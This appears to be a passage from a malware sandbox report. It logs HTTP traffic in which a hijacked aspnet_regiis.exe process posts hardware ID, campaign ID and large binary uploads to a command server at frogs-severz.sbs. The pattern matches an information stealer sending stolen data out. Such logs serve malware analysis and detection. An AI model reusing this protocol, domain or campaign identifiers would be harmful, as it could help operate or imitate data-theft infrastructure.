                                                                      2024-11-23 14:22:01 UTC12830OUTData Raw: 2d 2d 35 34 54 55 31 35 30 4b 45 30 50 56 52 59 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 0d 0a 2d 2d 35 34 54 55 31 35 30 4b 45 30 50 56 52 59 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 34 54 55 31 35 30 4b 45 30 50 56 52 59 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67
                                                                      Data Ascii: --54TU150KE0PVRYIQContent-Disposition: form-data; name="hwid"BDFA7B391BE94DD4BE8895FDBE41969D--54TU150KE0PVRYIQContent-Disposition: form-data; name="pid"2--54TU150KE0PVRYIQContent-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpg
                                                                      2024-11-23 14:22:02 UTC1004INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:22:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=ccclbs10v12gkr80vd3uepgom0; expires=Wed, 19-Mar-2025 08:08:40 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4OsUNrGOk77tsfIfYWjxe4V0QjfKTmnNj1cd8lHHzGMUdu4FmJ8tMu7zZMi4LCCk9mCcRL8f8PXpcqfQ4VGHeaPg4bHhSmbvBBSdtdZDrO04i3ZXUCxfux5cbrskuyJddTIo"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71cf1b3df10f71-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13768&delivery_rate=1813664&cwnd=250&unsent_bytes=0&cid=9d434b2abc917106&ts=762&x=0"
                                                                      2024-11-23 14:22:02 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 14:22:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.549712172.67.155.474432380C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:22:03 UTC274OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=E5O0FK1MFJ
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 15036
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-23 14:22:03 UTC15036OUTData Raw: 2d 2d 45 35 4f 30 46 4b 31 4d 46 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 0d 0a 2d 2d 45 35 4f 30 46 4b 31 4d 46 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 35 4f 30 46 4b 31 4d 46 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 0d 0a 2d 2d 45 35 4f 30 46 4b 31 4d 46 4a 0d 0a 43
                                                                      Data Ascii: --E5O0FK1MFJContent-Disposition: form-data; name="hwid"BDFA7B391BE94DD4BE8895FDBE41969D--E5O0FK1MFJContent-Disposition: form-data; name="pid"2--E5O0FK1MFJContent-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpgf--E5O0FK1MFJC
                                                                      2024-11-23 14:22:04 UTC1021INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:22:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=t0mc8sk92r42gqoijr6s6j9f5r; expires=Wed, 19-Mar-2025 08:08:42 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qDRcLum9YkgJMnsXXUFgHXiW0zu%2B7qDisCZak2zEaMD%2BHlrR%2BhkEdhSMaLOYInA5JP4mnrabTBceynGoY%2F1vH02LCIC5Rf8Hw%2BjuyM4h1xkOnBnCsGat9%2FR3KFI%2FiCwbtS%2Fq"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71cf28ac458c6c-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2035&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15968&delivery_rate=1407228&cwnd=168&unsent_bytes=0&cid=5f37e3074c071442&ts=782&x=0"
                                                                      2024-11-23 14:22:04 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 14:22:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.549714172.67.155.474432380C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:22:05 UTC281OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=XEPT2EPSN48ZUU9RJ
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 20568
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-23 14:22:05 UTC15331OUTData Raw: 2d 2d 58 45 50 54 32 45 50 53 4e 34 38 5a 55 55 39 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 0d 0a 2d 2d 58 45 50 54 32 45 50 53 4e 34 38 5a 55 55 39 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 45 50 54 32 45 50 53 4e 34 38 5a 55 55 39 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a
                                                                      Data Ascii: --XEPT2EPSN48ZUU9RJContent-Disposition: form-data; name="hwid"BDFA7B391BE94DD4BE8895FDBE41969D--XEPT2EPSN48ZUU9RJContent-Disposition: form-data; name="pid"3--XEPT2EPSN48ZUU9RJContent-Disposition: form-data; name="lid"LPnhqo--jqmircmz
                                                                      2024-11-23 14:22:05 UTC5237OUTData Raw: af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
                                                                      2024-11-23 14:22:06 UTC1009INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:22:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=nla2gmaaue3q997aln5o57jvci; expires=Wed, 19-Mar-2025 08:08:45 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzCPwkodxL8gQoJSZUMivNgF7IwMwxq1jHiKtNJ%2FtfwRcEA6f6u5sMxBuYAVTq0JKw5vk5qNuEdHsYkj576Pk7P6du3xY8SshTvLfPWI3BlQncJcdWkBGV0PQMCNmJ%2F5sIpX"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71cf3608bf4321-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1788&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21529&delivery_rate=1467336&cwnd=247&unsent_bytes=0&cid=13c103433902c62f&ts=900&x=0"
                                                                      2024-11-23 14:22:06 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 14:22:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.549716172.67.155.474432380C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:22:08 UTC273OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=4YLONCHJDY
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1241
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-23 14:22:08 UTC1241OUTData Raw: 2d 2d 34 59 4c 4f 4e 43 48 4a 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 0d 0a 2d 2d 34 59 4c 4f 4e 43 48 4a 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 59 4c 4f 4e 43 48 4a 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 0d 0a 2d 2d 34 59 4c 4f 4e 43 48 4a 44 59 0d 0a 43
                                                                      Data Ascii: --4YLONCHJDYContent-Disposition: form-data; name="hwid"BDFA7B391BE94DD4BE8895FDBE41969D--4YLONCHJDYContent-Disposition: form-data; name="pid"1--4YLONCHJDYContent-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpgf--4YLONCHJDYC
                                                                      2024-11-23 14:22:08 UTC1004INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:22:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=6q41vbo8um82uh9mmukl7m8mt3; expires=Wed, 19-Mar-2025 08:08:47 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PO5eLV78pDyI7hXiCVyCIXegYT3zXFRyy43W9I2Z9TORnQixMBAfIC74lbyaScz8FIMTgtBGTQ7DPIODoekqUOH3rjcvFQ2lXUpMFzWp%2FWzx6yDK5KFr6gQHN5ZmVfIScGYj"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71cf45cb5378e2-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1984&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2150&delivery_rate=1457085&cwnd=247&unsent_bytes=0&cid=ca56e0c3e48b2bd1&ts=785&x=0"
                                                                      2024-11-23 14:22:08 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 14:22:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.549717172.67.155.474432380C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:22:10 UTC278OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=XGTBCI5SBOJ8N
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 589595
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-23 14:22:10 UTC15331OUTData Raw: 2d 2d 58 47 54 42 43 49 35 53 42 4f 4a 38 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 0d 0a 2d 2d 58 47 54 42 43 49 35 53 42 4f 4a 38 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 47 54 42 43 49 35 53 42 4f 4a 38 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 0d 0a 2d 2d 58 47 54 42
                                                                      Data Ascii: --XGTBCI5SBOJ8NContent-Disposition: form-data; name="hwid"BDFA7B391BE94DD4BE8895FDBE41969D--XGTBCI5SBOJ8NContent-Disposition: form-data; name="pid"1--XGTBCI5SBOJ8NContent-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpgf--XGTB
                                                                      2024-11-23 14:22:10 UTC15331OUTData Raw: e9 54 5e 60 b2 d0 07 c8 8d 86 c6 06 31 61 d2 5b af 77 84 76 fa 0f 0e 5f 00 81 1d c3 8b 48 9a 85 64 be b7 35 21 6c 60 5e 3c a0 e9 af c2 9a a0 23 63 f7 2c eb d6 9e 3e 67 b6 ff 53 7d ae 5e 71 fd 54 74 c5 34 60 fc 73 1b e0 98 63 47 6c f6 4e df 3d c7 04 8c a2 c3 92 74 ac e5 be a3 5c 7c ce 70 67 0a 03 3a 01 02 dd 52 5e 18 90 14 40 75 d2 7d e1 8c a4 a5 0e 82 a2 e9 7f b4 3c ff d9 69 47 92 fd 76 a0 de ef 8f d8 5a bf e5 9f 5a 0c 75 0f d0 5f 6d 5f 97 07 18 af 14 89 40 72 dc 4a 39 44 e7 9a a8 10 5e 44 9f 38 37 72 c4 0d 77 41 c4 42 6e e7 13 00 35 48 d0 ba 27 57 fb 28 66 8b 77 23 a9 7e f2 a3 e1 11 e8 d0 c5 26 e0 75 5d 81 3f 0f 0b 26 ed 5c 2e 7a d5 ff 01 6e 5a 90 fd f5 96 47 b9 e0 0c c4 89 e0 11 34 45 5c ae 06 18 df 54 da b4 c6 e9 e8 d4 61 71 71 97 e9 79 7f 2b f9 a1 6e
                                                                      Data Ascii: T^`1a[wv_Hd5!l`^<#c,>gS}^qTt4`scGlN=t\|pg:R^@u}<iGvZZu_m_@rJ9D^D87rwABn5H'W(fw#~&u]?&\.znZG4E\Taqqy+n
                                                                      2024-11-23 14:22:10 UTC15331OUTData Raw: 40 aa 4e 8e 12 7e 1a 0e 01 b0 ce 4b e1 54 0d f6 0c e8 e1 7a 2d b8 d6 ac 8f d0 40 a0 c9 7f cc 55 85 88 d3 c8 15 a7 1e a8 5f 19 5c 9c ce 2c b0 ac f5 89 08 09 ec 55 ba 33 3e 61 66 2f 08 1e 51 e8 9c da b9 27 0e f3 77 cf af de 75 e6 b2 ce 25 01 46 67 35 e7 72 fa ac df 7d 12 29 e7 ba 20 4d fb 69 e6 82 42 e3 23 dd cd 3e de df 0f 93 62 5a 82 cd a1 92 e7 10 cc b3 36 cf b3 69 0d 02 43 b5 21 3a f9 01 b0 b7 21 4e d0 e2 38 13 b5 da 4a 34 89 d1 27 80 1e cc 03 b4 f8 7f ef 67 7a 08 f4 f7 e1 bd c2 12 81 d0 71 a0 83 57 a2 95 2d 26 1d 60 c9 64 01 2f 07 39 7a 1f 06 36 c0 c2 eb 72 f0 83 c3 9e 0d 6f f6 e9 48 ee 38 3e 79 77 01 77 01 b5 2b 9d 8e ce d5 00 9a 88 33 8c d6 ec 04 f6 bf a8 bd 53 1d dd 03 54 54 98 2f f6 76 9e a4 7b 1c 40 2e de 2a 51 7b 41 88 76 97 b5 b8 89 4e 24 93 2b
                                                                      Data Ascii: @N~KTz-@U_\,U3>af/Q'wu%Fg5r}) MiB#>bZ6iC!:!N8J4'gzqW-&`d/9z6roH8>yww+3STT/v{@.*Q{AvN$+
                                                                      2024-11-23 14:22:10 UTC15331OUTData Raw: 15 50 8d 3b f4 0d 46 32 e1 58 39 23 92 03 9c 22 f1 67 b3 c6 01 5c 01 1b 41 a9 fc 21 6c ef f6 57 1c b1 e6 1a 8c 18 09 55 49 c2 3c c4 c0 9d f2 4f d2 f7 00 e8 79 d4 0a a7 78 19 00 68 42 bf a0 c8 a6 97 e3 45 8d 87 bc 81 84 e5 7d 38 85 73 67 6e c2 48 21 f7 1f 54 77 1e f9 df 5b a3 66 77 c0 f2 a3 4f 18 47 39 a2 bf a7 f8 f4 2e 6c 45 76 eb 96 7b 37 0c 8a 20 bf 0b 7f 39 8d c7 b7 c1 76 b0 30 2e b6 08 10 e2 16 e3 c2 71 a4 76 e3 df ca db 9d 1a c6 94 7d 24 2c a5 69 bb a0 9c 25 21 7b 10 20 db 39 73 f7 21 bc 23 e9 6e 42 64 ed aa f8 50 48 08 2d 71 4f fe 67 4a 98 75 6f cf a8 8d 37 7b 91 59 c3 8b e6 46 16 c3 91 2d d3 08 6e b0 7f 7b 42 07 46 9a f1 f0 0e c7 02 ae a5 d9 0d c5 a1 ce b2 50 64 2c 08 d7 35 c7 b9 16 fa 7b bd 40 b6 8e a5 1c 37 cc fd fd d9 f9 06 f9 da 56 75 b5 30 ed
                                                                      Data Ascii: P;F2X9#"g\A!lWUI<OyxhBE}8sgnH!Tw[fwOG9.lEv{7 9v0.qv}$,i%!{ 9s!#nBdPH-qOgJuo7{YF-n{BFPd,5{@7Vu0
                                                                      2024-11-23 14:22:10 UTC15331OUTData Raw: b6 3e e7 c8 9a 99 81 3e 1e 1c d6 57 0a b6 7c 4d d2 ec 29 5a 06 e9 76 ba 2a 2c ec 33 9c f2 d0 88 a4 0e fa 7e 09 25 de b9 0c a2 67 4c f2 af bf 68 d1 66 b7 4e c6 0e 3a 3c d1 65 56 4f 53 a8 5e 31 e9 bc aa aa 25 04 c6 56 dc 7f 77 f9 b5 83 b7 f4 b4 02 b0 58 09 ff a1 37 7c ff 65 5a e5 b7 18 55 be e2 df df d8 25 26 b1 58 cb 4b d9 87 e3 dc 5b b6 af 30 c9 e1 21 fa f2 71 f0 41 eb 82 8f 8b 76 23 82 da 7a b3 28 15 1e e4 02 a9 6d 4e 5c e5 64 43 90 32 d3 15 0d e3 31 ca 44 04 17 dd ff eb f4 6c 52 38 e4 82 64 ed a4 ef f1 12 95 61 30 b0 41 f9 55 b2 27 05 24 f0 a4 bf 17 da f2 84 07 8e 6c 17 3d 1d 91 98 7c fd 60 dc 32 53 36 99 76 35 de 66 a2 f7 bd dc 37 85 96 2d 4b 8a 73 66 2a 2a 08 f9 d8 ff 5b 8b a4 cb cc 9e a0 cc 47 46 9b 2e e8 e6 d2 0e da 10 be 7b 72 7b a5 71 1f ee 46 bd
                                                                      Data Ascii: >>W|M)Zv*,3~%gLhfN:<eVOS^1%VwX7|eZU%&XK[0!qAv#z(mN\dC21DlR8da0AU'$l=|`2S6v5f7-Ksf**[GF.{r{qF
                                                                      2024-11-23 14:22:10 UTC15331OUTData Raw: ca c8 c3 e5 85 c7 f3 74 af 61 8d d3 2b 4f 2a f7 f8 0d fd 15 b0 d2 ff d7 4a ce a9 b7 f5 54 7e 30 f6 85 43 c0 ec d4 5a b7 2e 38 32 e2 9a 63 0c a2 97 16 3a ed 5d 8f ba 04 8f 3f b8 30 5a 9f f8 e5 b0 56 d5 bf de 3d 85 2a 31 b0 3d b7 c8 1d f4 24 fe 93 cc 67 e6 7c 75 e9 f6 0e 23 a0 70 d9 88 a2 a6 49 ef 5b d7 4a c2 81 09 22 39 16 14 9e 7d 59 76 76 ac 7b de be f5 e6 de 3d 21 57 0b 94 8d 93 9b 66 09 dc 44 0c 30 1e 8c a0 a5 29 82 e8 6f 0b f1 93 03 0f 67 af d7 38 2b 31 d7 1d 28 db f6 cd 0a 5a 0e c8 e5 0f a1 3d cf d3 75 11 42 c9 0d 26 69 4b f6 ba 87 ed 68 eb 5f da af 7a a3 c2 7b 75 06 23 ce 21 10 81 c3 54 d3 d1 ac 2f c3 61 ee f7 52 2c cc a4 a2 66 6f 70 07 03 ac 33 a3 fc 76 f1 64 f8 ee c6 61 50 78 68 ad 1b 0f bc 8f 8e 8a 82 77 a8 4f 2d c0 7b 87 06 e6 32 7a e3 f4 dd fe
                                                                      Data Ascii: ta+O*JT~0CZ.82c:]?0ZV=*1=$g|u#pI[J"9}Yvv{=!WfD0)og8+1(Z=uB&iKh_z{u#!T/aR,fop3vdaPxhwO-{2z
                                                                      2024-11-23 14:22:10 UTC15331OUTData Raw: a3 e8 d0 83 79 0e 77 cc db 7e 0a 8a f5 7c 47 c7 e5 66 8c a4 bc e7 f4 65 17 9e 1e 51 a0 0b d5 17 55 a5 e4 9b a1 c3 f6 5e fe 15 ab cb 9b 36 e2 60 6a b6 0e 46 18 9f 4c bb 67 b8 c9 f8 e9 7e 24 85 9e d8 62 3a 83 28 39 66 0e 4c e9 c6 24 d3 c6 a1 25 59 90 3c 53 69 eb c6 a8 7b e6 7d 50 25 43 63 fb 6d 88 a4 21 76 9c c5 e8 68 3a 9b 4d b7 e5 7f c6 04 f3 00 41 c4 46 ef 7a 64 02 e1 05 ee 60 3f dc d9 19 1b 60 b8 00 16 f6 23 bc a1 4c 49 c5 50 fd ac ab e6 01 50 fd d0 c9 b8 ec e3 0c c6 a9 a6 be 70 88 4b 44 98 d7 47 66 5d 98 36 00 07 67 a5 ef b9 36 ad cb 1f 5e cb 12 63 48 0c 24 4a 03 1b d6 f0 e9 37 ec 85 98 a6 4d 16 67 fc d7 e6 e1 ee 09 c0 78 9a a4 f8 14 a2 6f f9 df 6d 42 c9 c7 7b 4b 21 46 bf 4b 67 f9 82 3e 58 1b 15 02 57 2f 53 d6 15 d5 09 a2 c7 5d 9a 96 bc 30 5c ca ad 22
                                                                      Data Ascii: yw~|GfeQU^6`jFLg~$b:(9fL$%Y<Si{}P%Ccm!vh:MAFzd`?`#LIPPpKDGf]6g6^cH$J7MgxomB{K!FKg>XW/S]0\"
                                                                      2024-11-23 14:22:10 UTC15331OUTData Raw: b7 07 f2 b5 42 e4 9b 6c 4a 65 41 be 19 38 68 2c 5a c8 87 74 80 3c 6c 2e 7a 53 a6 f1 2c 0c 22 bd 31 3b 32 97 ec 6c 89 8a f0 60 19 60 4b 4c ad 97 53 a1 8d bd 98 a6 1b 6e 31 31 e7 74 4f dc 5f d3 8a 66 d9 b3 ca 3f 12 84 31 3d ed 3d 5a 82 16 72 4f 22 05 36 10 32 cb 4b 60 30 18 75 1b 12 ba 22 e4 d0 1f f1 4b e1 94 5d 1c fb 81 f3 60 46 d5 8d 8f aa 5a b8 de 85 ea da d0 9a 7f 25 44 ae 78 15 4a dd 6e bb 18 b7 32 fd 6f ff 8b e2 c2 6f 4d f8 23 87 62 46 fb e6 d5 aa 2a 02 03 bc 4e ce 2f 36 a4 0f ce b7 ec 31 1a 9c 2f 78 d3 a7 19 58 ef 7e 71 d1 e7 77 85 87 3d 5f 43 bf 3b 5d 9f 9e b6 c0 b4 1e aa 13 eb b6 b3 0f 52 b2 76 b1 1f ec 5e 5c 18 58 17 39 db 3a 89 45 ec b9 8e 79 16 28 8b d9 99 19 00 ce 04 56 1e c8 f5 a6 16 9b f1 f3 e3 bf 1f 55 19 aa b3 ed 13 ae d9 08 99 49 86 c2 ea
                                                                      Data Ascii: BlJeA8h,Zt<l.zS,"1;2l``KLSn11tO_f?1==ZrO"62K`0u"K]`FZ%DxJn2ooM#bF*N/61/xX~qw=_C;]Rv^\X9:Ey(VUI
